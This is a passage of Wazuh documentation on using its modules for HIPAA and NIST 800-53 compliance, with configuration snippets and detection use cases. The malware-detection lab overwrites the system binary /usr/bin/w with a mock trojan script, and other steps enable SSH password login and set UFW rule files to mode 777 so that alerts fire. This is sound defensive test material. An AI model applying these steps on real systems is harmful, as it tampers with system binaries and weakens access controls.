    The Wazuh Vulnerability Detection module assists in meeting aspects of this HIPAA section. The Vulnerability Detection module checks for vulnerable applications/packages and missing OS updates in an endpoint. Refer to the vulnerability detection section of our documentation for more details on configuring vulnerability detection.

Use case: Detect vulnerabilities

In this use case, you configure Wazuh to detect vulnerabilities on a Debian endpoint with the following steps:

  1. Edit the Wazuh server configuration file /var/ossec/etc/ossec.conf and make sure the Vulnerability Detection module is enabled:

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
  2. If you made changes, restart the Wazuh manager to apply them.

    # systemctl restart wazuh-manager
    

You can view the results on the Wazuh dashboard, which includes information about vulnerable packages on the monitored endpoint. In this case, the vim software installed on the endpoint has vulnerabilities.

When you select any of the vulnerabilities, the dashboard shows an overview of the issues detected.

Active Response

The Wazuh Active Response module can be configured to automatically execute scripts when events match specified rules in the Wazuh ruleset. These scripts may perform a firewall block or drop, traffic shaping or throttling, account lockout, or any other user-defined action.

The Active Response module assists in meeting the following HIPAA section:

  • Security Incident Procedures §164.308(a)(6)(i) - Response and Reporting: “Identify and respond to suspected or known security incidents; mitigate, to the extent practicable, harmful effects of security incidents that are known to the covered entity or business associate; and document security incidents and their outcomes.”

    The goal of this section is to make sure that you detect and respond to security incidents in your environment. The Active Response module assists in meeting this HIPAA section by responding to intrusions and unauthorized file changes. For more information on configuring Active Response, see the Active Response section of our documentation.

Use case: Block an IP address

In this use case, you configure the Active Response module to block an IP address when someone attempts to log in to an Ubuntu 22.04 endpoint with a non-existent user via SSH. To implement this, follow the steps below:

  1. Add the following block to the Wazuh server configuration file (/var/ossec/etc/ossec.conf).

    <active-response>
      <disabled>no</disabled>
      <command>firewall-drop</command>
      <location>local</location>
      <rules_id>5710</rules_id>
      <timeout>100</timeout>
    </active-response>
    

    This configures Active Response to execute the firewall-drop command when there is an attempt to log in with a non-existent user (rule 5710).

    Note

    The Wazuh server configuration file includes the firewall-drop command by default.

  2. Restart the Wazuh server to apply the configuration:

    # systemctl restart wazuh-manager
    

    When you attempt to SSH with a non-existent user, rule 5710 generates an alert followed by an Active Response event.
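
    To confirm on the endpoint that the response ran, you can check the active response log of the Wazuh agent (the path below assumes a Linux agent installed in the default location):

    # tail /var/ossec/logs/active-responses.log
    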

Using Wazuh for NIST 800-53 compliance

NIST 800-53 is a cybersecurity framework developed by the National Institute of Standards and Technology (NIST). NIST 800-53 specifies security and privacy mechanisms and controls that U.S. federal information systems must implement and meet. The U.S. government makes compliance with these requirements mandatory for organizations and entities that process and handle federal data.

While NIST guidelines and recommendations are primarily targeted at federal agencies in the United States, they are widely used and respected by organizations in other sectors and countries as well. In fact, many industries and organizations have adopted the NIST Cybersecurity Framework as a basis for their own cybersecurity practices.

Wazuh has various capabilities and modules, such as log data analysis, file integrity monitoring, configuration assessment, threat detection, and autonomous response, that help improve organizations' cybersecurity posture. These Wazuh modules and capabilities also assist organizations in complying with NIST 800-53 controls.

Wazuh includes default rules and decoders for detecting security incidents, system errors, security misconfigurations, and policy violations. These rules are mapped to the NIST 800-53 controls by default. In addition to the default rule mapping provided by Wazuh, it’s possible to map your custom rules to one or more NIST 800-53 controls. For this, you need to add their compliance identifier in the <group> tag of the rule. The syntax used to map a rule to a NIST 800-53 control is nist_800_53_ followed by the acronym of the control and the specific control number. For example, the syntax nist_800_53_AU.12 maps a rule to the AU-12 Audit Record Generation control. Refer to the Rules syntax section for more information.
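
As a purely illustrative example of this syntax, the hypothetical custom rule below (rule ID 100020 is arbitrary and not part of the default ruleset) is mapped to the AU-12 Audit Record Generation control by including the identifier in its <group> tag; it is modeled on the local FIM rule shown earlier in this documentation:

    <rule id="100020" level="10">
      <if_matched_group>syscheck</if_matched_group>
      <match>/var/log</match>
      <description>Custom rule mapped to a NIST 800-53 control.</description>
      <group>syscheck,nist_800_53_AU.12,</group>
    </rule>
    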

In the Wazuh for NIST 800-53 revision 5 guide (PDF), we explain how the various Wazuh modules assist in meeting and implementing NIST 800-53 controls.

We have some use cases in the following sections that show how to use Wazuh capabilities and modules to comply with NIST 800-53 controls:

Visualization and dashboard

Wazuh offers a web dashboard for continuous data visualization and analysis. The Wazuh dashboard comes with out-of-the-box modules for threat hunting, regulatory compliance, detected vulnerable applications, file integrity monitoring, configuration assessment results, and cloud infrastructure monitoring. It helps perform forensic and historical alert analyses.

The Wazuh dashboard assists in meeting the following NIST 800-53 controls:

  • AU-6 Audit record review, analysis, and reporting: “Audit record review, analysis, and reporting covers information security and privacy-related logging performed by organizations, including logging that results from the monitoring of account usage, remote access, wireless connectivity, mobile device connection, configuration settings, system component inventory, use of maintenance tools and non-local maintenance, physical access, temperature and humidity, equipment delivery and removal, communications at system interfaces, and use of mobile code or Voice over Internet Protocol (VoIP). Findings can be reported to organizational entities that include the incident response team, help desk, and security or privacy offices. If organizations are prohibited from reviewing and analyzing audit records or unable to conduct such activities, the review or analysis may be carried out by other organizations granted such authority. The frequency, scope, and/or depth of the audit record review, analysis, and reporting may be adjusted to meet organizational needs based on new information received.”

  • CA-7 Continuous monitoring: “Continuous monitoring at the system level facilitates ongoing awareness of the system security and privacy posture to support organizational risk management decisions. The terms continuous and ongoing imply that organizations assess and monitor their controls and risks at a frequency sufficient to support risk-based decisions. Different types of controls may require different monitoring frequencies. The results of continuous monitoring generate risk response actions by organizations. When monitoring the effectiveness of multiple controls that have been grouped into capabilities, a root-cause analysis may be needed to determine the specific control that has failed. Continuous monitoring programs allow organizations to maintain the authorizations of systems and common controls in highly dynamic environments of operation with changing mission and business needs, threats, vulnerabilities, and technologies. Having access to security and privacy information on a continuing basis through reports and dashboards gives organizational officials the ability to make effective and timely risk management decisions, including ongoing authorization decisions.”

The Wazuh dashboard module provides dashboards for continuously monitoring and reviewing security incidents and generating reports of security and audit events. The Wazuh dashboard and its NIST 800-53 module help you meet the above NIST 800-53 controls.

Use cases
Generate a report of successful authentications

This use case shows how Wazuh helps meet the CA-7 Continuous monitoring NIST requirement by providing security reporting to administrators. Use the Wazuh dashboard to generate a report of all successful authentications in the last 24 hours:

  1. Go to the Wazuh dashboard menu and select Discover under Explore.

  2. Add a filter for the authentication_success rule group and click Save.

  3. Save the results of the search using any name of your choice.

  4. Select Reporting, then choose Generate CSV. This downloads a report of all successful authentication events as a CSV file for your review.

Review NIST 800-53 alerts

In this use case, Wazuh assists security administrators in meeting the AU-6 Audit record review, analysis, and reporting requirement by providing a NIST 800-53 compliance dashboard.

  1. Select the NIST 800-53 module from your Wazuh dashboard.

  2. Select the Events tab to see all alerts related to NIST 800-53 controls.

  3. Select the Controls tab to view available control requirements.

    The Controls section of the NIST 800-53 compliance dashboard shows the various NIST 800-53 controls and the related events. For ease of navigation, the Wazuh dashboard groups events according to the NIST 800-53 control they meet or violate.

    Select the Controls tab
    Recent events

Log data analysis

The Wazuh log data analysis module collects and analyzes logs from various sources, such as applications, systems, network devices, and cloud workloads. This data helps in resource monitoring, threat detection, and incident response.

The Wazuh Log data analysis module helps comply with the following NIST 800-53 controls:

  • IA-4 Identifier management: “Common device identifiers include Media Access Control (MAC) addresses, Internet Protocol (IP) addresses, or device-unique token identifiers. The management of individual identifiers is not applicable to shared system accounts. Typically, individual identifiers are the usernames of the system accounts assigned to those individuals. In such instances, the account management activities of AC-2 use account names provided by IA-4. Identifier management also addresses individual identifiers not necessarily associated with system accounts. Preventing the reuse of identifiers implies preventing the assignment of previously used individual, group, role, service, or device identifiers to different individuals, groups, roles, services, or devices.”

  • SI-4 System monitoring: “System monitoring includes external and internal monitoring. External monitoring includes the observation of events occurring at external interfaces to the system. Internal monitoring includes the observation of events occurring within the system. Organizations monitor systems by observing audit activities in real-time or by observing other system aspects such as access patterns, characteristics of access, and other actions. The monitoring objectives guide and inform the determination of the events. System monitoring capabilities are achieved through a variety of tools and techniques, including intrusion detection and prevention systems, malicious code protection software, scanning tools, audit record monitoring software, and network monitoring software.”

The above NIST 800-53 controls require you to monitor system activities in your organization. Analysis of these activities helps you keep track of security incidents and occurrences within your infrastructure. The Wazuh log data analysis module analyzes logs and generates alerts when it detects suspicious activities.

Use case: Failed authentication attempts on a Windows endpoint

This use case shows how Wazuh helps meet the IA-4 Identifier management requirement by using the source IP address as an example of a device identifier. In this scenario, Wazuh detects failed login attempts on a monitored Windows 10 endpoint.

  1. Enable RDP on the Windows 10 endpoint. Select Start > Settings > System > Remote Desktop, and turn on Enable Remote Desktop. Please note that some Windows versions might not support Remote Desktop.

  2. Open the Remote Desktop Connection application from another Windows endpoint on the same network. Perform five failed login attempts against the monitored Windows endpoint.

    Open the Remote Desktop
  3. Expand one of the rule ID 60204 alerts on the Wazuh dashboard. The alert details provide more information about the multiple logon failure event, such as the target username, device identifiers like the source IP address, and the NIST 800-53 control the event relates to.

    Expand an alert on the Wazuh dashboard

Security configuration assessment

The Wazuh Security Configuration Assessment (SCA) module performs scans to determine if monitored endpoints meet secure configuration and hardening policies. These scans assess the endpoint configuration using policy files. These policy files contain rules that serve as a benchmark for the configurations that exist on the monitored endpoint.

The Wazuh SCA helps to comply with the following NIST 800-53 controls:

  • SC-7 Boundary protection: “Managed interfaces include gateways, routers, firewalls, guards, network-based malicious code analysis, virtualization systems, or encrypted tunnels implemented within a security architecture. Subnetworks that are physically or logically separated from internal networks are referred to as demilitarized zones or DMZs. Restricting or prohibiting interfaces within organizational systems includes restricting external web traffic to designated web servers within managed interfaces, prohibiting external traffic that appears to be spoofing internal addresses, and prohibiting internal traffic that appears to be spoofing external addresses. SP 800-189 provides additional information on source address validation techniques to prevent ingress and egress of traffic with spoofed addresses. Commercial telecommunications services are provided by network components and consolidated management systems shared by customers. These services may also include third-party-provided access lines and other service elements. Such services may represent sources of increased risk despite contract security provisions. Boundary protection may be implemented as a common control for all or part of an organizational network such that the boundary to be protected is greater than a system-specific boundary (i.e., an authorization boundary).”

  • IA-5 Authenticator management: “Authenticators include passwords, cryptographic devices, biometrics, certificates, one-time password devices, and ID badges. Device authenticators include certificates and passwords. Initial authenticator content is the actual content of the authenticator (e.g., the initial password). In contrast, the requirements for authenticator content contain specific criteria or characteristics (e.g., minimum password length). Developers may deliver system components with factory default authentication credentials (i.e., passwords) to allow for initial installation and configuration. Default authentication credentials are often well-known, easily discoverable, and present a significant risk. The requirement to protect individual authenticators may be implemented via control PL-4 or PS-6 for authenticators in the possession of individuals and by controls AC-3, AC-6, and SC-28 for authenticators stored in organizational systems, including passwords stored in hashed or encrypted formats or files containing encrypted or hashed passwords accessible with administrator privileges.”

  • CM-6 Configuration settings: “Configuration settings are the parameters that can be changed in the hardware, software, or firmware components of the system that affect the security and privacy posture or functionality of the system. Information technology products for which configuration settings can be defined include mainframe computers, servers, workstations, operating systems, mobile devices, input/output devices, protocols, and applications. Parameters that impact the security posture of systems include registry settings; account, file, or directory permission settings; and settings for functions, protocols, ports, services, and remote connections.”

Wazuh has out-of-the-box SCA policies to check if endpoints meet authentication, network, and boundary policies, among other security policies. The Wazuh SCA module scans endpoints regularly to determine if they comply with specific security policies.
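
SCA behavior is controlled from the <sca> block of the agent configuration file. The snippet below is a sketch of a typical configuration with commonly used default values; verify it against the ossec.conf on your own agents rather than treating it as authoritative:

    <sca>
      <enabled>yes</enabled>
      <scan_on_start>yes</scan_on_start>
      <interval>12h</interval>
      <skip_nfs>yes</skip_nfs>
    </sca>

With this configuration, the agent evaluates its enabled policy files at every interval and after each restart.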

Use case: Ensure default deny firewall policy and SCA scan

This use case shows how Wazuh helps meet the CM-6 Configuration settings requirement by ensuring endpoint compliance with the CIS configuration benchmark. In this scenario, Wazuh runs default SCA checks to determine the default firewall deny policy status on an Ubuntu 22.04 endpoint.

  1. Restart the Wazuh agent to trigger a new SCA scan.

    # systemctl restart wazuh-agent
    
  2. Select the Configuration Assessment module on your Wazuh dashboard. SCA scans are enabled by default, so no further configuration is required.

    Select the SCA module
  3. Select the endpoint running the Wazuh agent.

    Select the endpoint
  4. Select CIS benchmark for Ubuntu Linux 22.04 LTS.

    Select CIS benchmark

    This scan helps ensure that the endpoint complies with security policies and hardening configurations. CIS Benchmark for Ubuntu Linux 22.04 LTS shows the results of the SCA checks (passed, failed, and not applicable) and the time of the last scan, as shown above.

  5. Navigate to ID 28577.

    Navigate to ID 28577

    This SCA check returns Failed if a default deny firewall policy is not configured on the endpoint. Additionally, each SCA check contains the rationale for the check, a description, and a possible remediation for a failed result.
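
    For this particular check, a possible remediation (assuming UFW is the firewall in use on the Ubuntu endpoint) is to set default deny policies and then explicitly allow the traffic you still need, such as SSH and the Wazuh agent connection to the manager (1514/TCP by default). The commands below are a sketch; review them against your own network requirements before applying them:

    # ufw default deny incoming
    # ufw default deny outgoing
    # ufw default deny routed
    # ufw allow ssh
    # ufw allow out 1514/tcp
    # ufw enable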

Malware detection

Wazuh offers several capabilities that support malware detection. The Malware detection module uses the following integrations and methods to detect malicious activities on a monitored endpoint:

  • File integrity monitoring and threat detection rules.

  • Rootkit behavior detection rules.

  • CDB lists and threat intelligence to detect and remove malicious files.

  • VirusTotal integration for malware detection.

  • File integrity monitoring and YARA scans for malware detection.

  • Custom rules to detect malware IOC.

  • ClamAV logs collection.

  • Windows Defender logs collection.

These Malware detection components of Wazuh help you comply with the following NIST 800-53 controls:

  • SI-3 Malicious code protection: “Malicious code protection mechanisms include both signature and non-signature-based technologies. Non-signature-based detection mechanisms include artificial intelligence techniques that use heuristics to detect, analyze, and describe the characteristics or behavior of malicious code and to provide controls against such code for which signatures do not yet exist or for which existing signatures may not be effective. Such malicious code includes polymorphic malicious code (i.e., code that changes signatures when it replicates). Non-signature-based mechanisms also include reputation-based technologies. In addition to the above technologies, pervasive configuration management, comprehensive software integrity controls, and anti-exploitation software may be effective in preventing the execution of unauthorized code. Malicious code may be present in commercial off-the-shelf software as well as custom-built software and could include logic bombs, backdoors, and other types of attacks that could affect organizational mission and business functions.”

  • SI-7 Software, firmware, and information integrity: “Unauthorized changes to software, firmware, and information can occur due to errors or malicious activity. Software includes operating systems (with key internal components, such as kernels or drivers), middleware, and applications. Firmware interfaces include Unified Extensible Firmware Interface (UEFI) and Basic Input/Output System (BIOS). Information includes personally identifiable information and metadata that contains security and privacy attributes associated with information. Integrity-checking mechanisms-including parity checks, cyclic redundancy checks, cryptographic hashes, and associated tools-can automatically monitor the integrity of systems and hosted applications.”

The NIST 800-53 controls above require users to have tools and processes to detect malicious code and modified software and firmware. Wazuh supports the detection of suspicious system binaries, malware, and suspicious processes using out-of-the-box rules, VirusTotal and YARA integrations, and CDB lists. In addition, Wazuh also includes a File Integrity Monitoring module that allows users to continuously monitor specific files and paths that malware might use.
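
As an illustration of one of these integrations, the VirusTotal lookup is enabled by adding an <integration> block to the Wazuh server configuration file /var/ossec/etc/ossec.conf and restarting the Wazuh manager. The sketch below assumes you have a VirusTotal API key; <YOUR_VIRUSTOTAL_API_KEY> is a placeholder, and the syscheck group forwards FIM alerts for file hash lookups:

    <integration>
      <name>virustotal</name>
      <api_key><YOUR_VIRUSTOTAL_API_KEY></api_key>
      <group>syscheck</group>
      <alert_format>json</alert_format>
    </integration>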

Use case: Detecting suspicious binaries

This use case shows how Wazuh meets the SI-3 Malicious code protection requirement by detecting a malicious binary on a monitored endpoint. In this scenario, the Wazuh rootcheck module detects a trojaned system binary on an Ubuntu 22.04 endpoint.

The Wazuh rootcheck module is enabled by default in the Wazuh agent configuration file. The rootcheck section of the documentation explains the options available in the rootcheck module.
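
For reference, a typical rootcheck block in /var/ossec/etc/ossec.conf looks similar to the sketch below. The exact defaults can vary between Wazuh versions, so treat the values as illustrative:

    <rootcheck>
      <disabled>no</disabled>
      <check_files>yes</check_files>
      <check_trojans>yes</check_trojans>
      <check_dev>yes</check_dev>
      <check_sys>yes</check_sys>
      <check_pids>yes</check_pids>
      <check_ports>yes</check_ports>
      <check_if>yes</check_if>
      <!-- Frequency in seconds (every 12 hours) -->
      <frequency>43200</frequency>
      <rootkit_files>etc/shared/rootkit_files.txt</rootkit_files>
      <rootkit_trojans>etc/shared/rootkit_trojans.txt</rootkit_trojans>
      <skip_nfs>yes</skip_nfs>
    </rootcheck>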

  1. Create a copy of the original system binary:

    $ sudo cp -p /usr/bin/w /usr/bin/w.copy
    
  2. Replace the original system binary /usr/bin/w with the following shell script:

    $ sudo tee /usr/bin/w << EOF
    #!/bin/bash
    echo "`date` this is evil" > /tmp/trojan_created_file
    echo 'test for /usr/bin/w trojaned file' >> /tmp/trojan_created_file
    # Now running original binary
    /usr/bin/w.copy
    EOF
    
  3. Restart the Wazuh agent to see the relevant alert:

    $ sudo systemctl restart wazuh-agent
    
  4. Navigate to the Threat Hunting dashboard. Search for the event with rule ID 510.

    Threat Hunting dashboard
    Rule ID 510 event

The image above shows an example of a suspicious binary file detected on a monitored endpoint.

File integrity monitoring

The Wazuh File Integrity Monitoring (FIM) module monitors an endpoint filesystem to detect file changes in specified files and directories. It triggers alerts on file creation, modification, or deletion from the monitored paths. The FIM module compares the cryptographic checksum and other attributes of the monitored files and folders when a change occurs.

The Wazuh File Integrity Monitoring module assists you in meeting the following NIST 800-53 controls:

  • SC-28 Protection of information at rest: “Information at rest refers to the state of information when it is not in process or in transit and is located on system components. Such components include internal or external hard disk drives, storage area network devices, or databases. However, the focus of protecting information at rest is not on the type of storage device or frequency of access but rather on the state of the information. Information at rest addresses the confidentiality and integrity of information and covers user information and system information. System-related information that requires protection includes configurations or rule sets for firewalls, intrusion detection and prevention systems, filtering routers, and authentication information. Organizations may employ different mechanisms to achieve confidentiality and integrity protections, including the use of cryptographic mechanisms and file share scanning. Integrity protection can be achieved, for example, by implementing write-once-read-many (WORM) technologies. When adequate protection of information at rest cannot otherwise be achieved, organizations may employ other controls, including frequent scanning to identify malicious code at rest and secure offline storage in lieu of online storage.”

  • CM-3 Configuration changes control: “Configuration change control for organizational systems involves the systematic proposal, justification, implementation, testing, review, and disposition of system changes, including system upgrades and modifications. Configuration change control includes changes to baseline configurations, configuration items of systems, operational procedures, configuration settings for system components, remediate vulnerabilities, and unscheduled or unauthorized changes. Processes for managing configuration changes to systems include Configuration Control Boards or Change Advisory Boards that review and approve proposed changes. For changes that impact privacy risk, the senior agency official for privacy updates privacy impact assessments and system of records notices. For new systems or major upgrades, organizations consider including representatives from the development organizations on the Configuration Control Boards or Change Advisory Boards. Auditing of changes includes activities before and after changes are made to systems and the auditing activities required to implement such changes. See also SA-10.”

These NIST 800-53 controls require you to protect information at rest and monitor configuration changes in your infrastructure. The Wazuh FIM module helps you monitor the creation, modification, and deletion of files, directories, and Windows registry keys. This helps you meet the NIST 800-53 controls that require monitoring changes to files and folders.

Use cases
Detect SSH configuration changes

This use case shows how Wazuh helps meet the SC-28 Protection of information at rest requirement by providing file integrity monitoring on specified files and paths.

In this scenario, the Wazuh FIM monitors the SSH configuration file /etc/ssh/sshd_config on an Ubuntu 22.04 endpoint to detect changes in the SSH configuration. Monitor the SSH configuration file for changes using the steps below:

  1. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf. This monitors the /etc/ssh/sshd_config file for changes:

    <directories report_changes="yes" realtime="yes">/etc/ssh/sshd_config</directories>
    
  2. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  3. Change the PasswordAuthentication option in the /etc/ssh/sshd_config file from no to yes to create a change in the SSH configuration:

    # sed -re 's/^(PasswordAuthentication)([[:space:]]+)no/\1\2yes/' -i.`date -I` /etc/ssh/sshd_config
    
  4. Select the File Integrity Monitoring module from the Wazuh dashboard. Find the alert triggered by rule ID 550. The alert details show that the content of /etc/ssh/sshd_config has changed. They include the differences in the file checksum, the modification time, and other information.

    File Integrity Monitoring module
Detecting change actors to UFW firewall rules using who-data

This use case shows how Wazuh helps meet the CM-3 Configuration changes control requirement by providing extra audit data on triggered events for monitoring system configuration changes.

In this scenario, the Wazuh FIM monitors the Uncomplicated Firewall (UFW) rule files in the /etc/ufw/ directory on an Ubuntu 22.04 endpoint. Using who-data, you can get more information like the user, program, or process that made changes to a monitored file or folder. Perform the steps below to monitor and detect changes to the UFW rule files:

  1. Add the following configuration to the <syscheck> block of the Wazuh agent configuration file /var/ossec/etc/ossec.conf. This monitors all UFW rule files for changes:

    <directories report_changes="yes" whodata="yes">/etc/ufw/</directories>
    

    UFW stores its rule files in the /etc/ufw/ directory, and all rule files have the extension .rules. We use the configuration above to monitor the modification, addition, and deletion of any files in the /etc/ufw/ directory.

  2. Restart the Wazuh agent to apply the changes:

    # systemctl restart wazuh-agent
    
  3. Modify the permissions for an existing rule file, user.rules, in the /etc/ufw directory to create a change to the UFW rule files:

    # chmod 777 /etc/ufw/user.rules
    
  4. Check the alert for rule ID 550 on the Wazuh dashboard. This alert shows that the permissions of the /etc/ufw/user.rules file have changed.

    Alert of rule ID 550
  5. Expand the alert to view the full_log field. This field shows an overview of the event.

    The full_log field
  6. Check the syscheck.audit.login_user.name and syscheck.audit.process.name fields to see the user and process that initiated the change.

    Check syscheck fields

System inventory

The Wazuh Syscollector module gathers system resource information from each monitored endpoint. The information gathered includes hardware details, OS information, network details, and running processes. The Wazuh agent runs periodic scans on the endpoint and constantly updates the appropriate system information. The Wazuh Syscollector module helps to meet the following NIST 800-53 controls:

  • CM-7 Least functionality: “Systems provide a wide variety of functions and services. Some of the functions and services routinely provided by default may not be necessary to support essential organizational missions, functions, or operations. Additionally, it is sometimes convenient to provide multiple services from a single system component, but doing so increases risk over limiting the services provided by that single component. Where feasible, organizations limit component functionality to a single function per component. Organizations consider removing unused or unnecessary software and disabling unused or unnecessary physical and logical ports and protocols to prevent unauthorized connection of components, transfer of information, and tunneling. Organizations employ network scanning tools, intrusion detection and prevention systems, and end-point protection technologies, such as firewalls and host-based intrusion detection systems, to identify and prevent the use of prohibited functions, protocols, ports, and services. Least functionality can also be achieved as part of the fundamental design and development of the system (see SA-8, SC-2, and SC-3).”

  • CM-8 System component inventory: “System components are discrete, identifiable information technology assets that include hardware, software, and firmware. Organizations may choose to implement centralized system component inventories that include components from all organizational systems. In such situations, organizations ensure that the inventories include system-specific information required for component accountability. The information necessary for effective accountability of system components includes the system name, software owners, software version numbers, hardware inventory specifications, software license information, and for networked components, the machine names and network addresses across all implemented protocols (e.g., IPv4, IPv6). Inventory specifications include date of receipt, cost, model, serial number, manufacturer, supplier information, component type, and physical location.”

The NIST 800-53 controls above require you to maintain an inventory of system components, including ports, protocols, applications, and services, and their authorized usage. The CM-7 Least functionality requirement specifies that you must permit only a minimum useful set of features necessary for software or systems functioning. The Wazuh Syscollector module helps to meet an aspect of this control by providing detailed information on processes, packages, and ports that run on a monitored endpoint.

Use case: Inventory of applications installed on a Windows endpoint

This use case shows how Wazuh helps meet the NIST CM-8 System component inventory requirement by providing a system inventory module.

Using the Wazuh Syscollector module for this use case, you can see all packages installed on a monitored Windows endpoint. You can find this information on the Wazuh dashboard for the specific agent.

  1. Restart the Wazuh agent to trigger a new system inventory scan.

    > Restart-Service -Name wazuh
    
  2. Go to IT Hygiene on the Wazuh dashboard and select your endpoint.

    Inventory data

The Wazuh Syscollector module runs all available scans once every twelve hours by default on all compatible operating systems.
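
The same inventory data is also available through the Wazuh server API. The sketch below assumes the API listens on https://<WAZUH_MANAGER_IP>:55000, that <API_USER> and <API_PASSWORD> are valid API credentials, and that 001 is the ID of the agent you want to inspect:

    # Obtain a JWT token for the API session
    TOKEN=$(curl -s -k -u <API_USER>:<API_PASSWORD> -X POST \
      "https://<WAZUH_MANAGER_IP>:55000/security/user/authenticate?raw=true")

    # List the packages inventoried on agent 001
    curl -s -k -H "Authorization: Bearer $TOKEN" \
      "https://<WAZUH_MANAGER_IP>:55000/syscollector/001/packages?pretty=true"

Similar endpoints exist for processes, ports, and hardware information.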

Vulnerability detection

The Wazuh Vulnerability Detection module performs a software audit. It identifies vulnerabilities in the operating system and installed applications on monitored endpoints. The module queries our Cyber Threat Intelligence (CTI) API for vulnerability content documents. We aggregate vulnerability information into the CTI repository from external vulnerability sources indexed by Canonical, Debian, Red Hat, Arch Linux, Amazon Linux Advisories Security (ALAS), Microsoft, CISA, and the National Vulnerability Database (NVD). We also maintain the integrity of our vulnerability data and keep the vulnerability repository updated, ensuring the solution checks for the latest CVEs. The Vulnerability Detection module correlates this information with data from the endpoint application inventory.

The Vulnerability Detection module helps to implement the following NIST 800-53 controls:

  • RA-5 Vulnerability monitoring and scanning: “Vulnerability monitoring includes scanning for patch levels; scanning for functions, ports, protocols, and services that should not be accessible to users or devices; and scanning for flow control mechanisms that are improperly configured or operating incorrectly. Vulnerability monitoring may also include continuous vulnerability monitoring tools that use instrumentation to continuously analyze components. Instrumentation-based tools may improve accuracy and may be run throughout an organization without scanning. Vulnerability monitoring tools that facilitate interoperability include tools that are Security Content Automation Protocol (SCAP)-validated. Thus, organizations consider using scanning tools that express vulnerabilities in the Common Vulnerabilities and Exposures (CVE) naming convention and that employ the Open Vulnerability Assessment Language (OVAL) to determine the presence of vulnerabilities. Sources for vulnerability information include the Common Weakness Enumeration (CWE) listing and the National Vulnerability Database (NVD). Control assessments, such as red team exercises, provide additional sources of potential vulnerabilities for which to scan. Organizations also consider using scanning tools that express vulnerability impact by the Common Vulnerability Scoring System (CVSS).”

  • SC-38 Operations security: “Operations security (OPSEC) is a systematic process by which potential adversaries can be denied information about the capabilities and intentions of organizations by identifying, controlling, and protecting generally unclassified information that specifically relates to the planning and execution of sensitive organizational activities. The OPSEC process involves five steps: identification of critical information, analysis of threats, analysis of vulnerabilities, assessment of risks, and the application of appropriate countermeasures. OPSEC controls are applied to organizational systems and the environments in which those systems operate. OPSEC controls protect the confidentiality of information, including limiting the sharing of information with suppliers, potential suppliers, and other non-organizational elements and individuals. Information critical to organizational mission and business functions includes user identities, element uses, suppliers, supply chain processes, functional requirements, security requirements, system design specifications, testing and evaluation protocols, and security control implementation details.”

The Wazuh Vulnerability Detection module assists with the above requirements by checking for vulnerable applications and packages as well as missing OS updates on an endpoint.

Use case: Detect vulnerabilities on a Windows endpoint

This use case shows how Wazuh helps meet the NIST RA-5 Vulnerability monitoring and scanning requirement using the Vulnerability detection module to identify system vulnerabilities.

In this use case, you make sure that a monitored Windows 10 endpoint is properly configured and that the Wazuh Vulnerability Detection module is enabled. The Vulnerability Detection module of the Wazuh dashboard then shows the detected vulnerabilities.

Windows endpoint
  1. Check that the following options are enabled within the syscollector wodle block of the Wazuh agent configuration file, C:\Program Files (x86)\ossec-agent\ossec.conf on Windows:

    <!-- System inventory -->
       <wodle name="syscollector">
         <disabled>no</disabled>
         <interval>1h</interval>
         <scan_on_start>yes</scan_on_start>
         <hardware>yes</hardware>
         <os>yes</os>
         <network>yes</network>
         <packages>yes</packages>
         <ports all="no">yes</ports>
         <processes>yes</processes>
         <users>yes</users>
         <groups>yes</groups>
         <services>yes</services>
         <browser_extensions>yes</browser_extensions>
    
         <!-- Database synchronization settings -->
         <synchronization>
           <max_eps>10</max_eps>
           <integrity_interval>24h</integrity_interval>
         </synchronization>
       </wodle>
    
Wazuh server
  1. Edit the <vulnerability-detection> block within the /var/ossec/etc/ossec.conf file and make sure <enabled> is set to yes. This enables the vulnerability detection module.

    <vulnerability-detection>
      <enabled>yes</enabled>
      <index-status>yes</index-status>
      <feed-update-interval>60m</feed-update-interval>
    </vulnerability-detection>
    
    <indexer>
      <enabled>yes</enabled>
      <hosts>
        <host>https://0.0.0.0:9200</host>
      </hosts>
      <ssl>
        <certificate_authorities>
          <ca>/etc/filebeat/certs/root-ca.pem</ca>
        </certificate_authorities>
        <certificate>/etc/filebeat/certs/filebeat.pem</certificate>
        <key>/etc/filebeat/certs/filebeat-key.pem</key>
      </ssl>
    </indexer>
    
  2. If you made changes, restart the Wazuh server to apply them.

    # systemctl restart wazuh-manager
    
  3. Go to Vulnerability Detection > Inventory on the Wazuh dashboard. Select the Windows agent to find vulnerable applications and packages.

The alert details include the CVE number and severity, amongst other information.

Alert details
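
You can also query the vulnerability findings directly from the Wazuh indexer. The sketch below assumes a recent Wazuh release in which vulnerability states are stored in a wazuh-states-vulnerabilities-* index, and uses placeholder credentials and agent name; the index and field names may differ slightly in your deployment:

    curl -k -u admin:<INDEXER_PASSWORD> -H 'Content-Type: application/json' \
      -X GET "https://<INDEXER_IP>:9200/wazuh-states-vulnerabilities-*/_search?pretty" -d '
    {
      "query": {
        "bool": {
          "filter": [
            { "term": { "agent.name": "<WINDOWS_AGENT_NAME>" } },
            { "term": { "vulnerability.severity": "Critical" } }
          ]
        }
      },
      "size": 20
    }'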

Active Response

The Wazuh Active Response module performs autonomous actions on endpoints to mitigate security threats. You can configure the module to automatically execute scripts when specific alerts trigger. These scripts execute actions, such as a firewall block or drop, traffic shaping or throttling, and account lockout.

The Wazuh Active Response module assists in meeting the following NIST 800-53 controls:

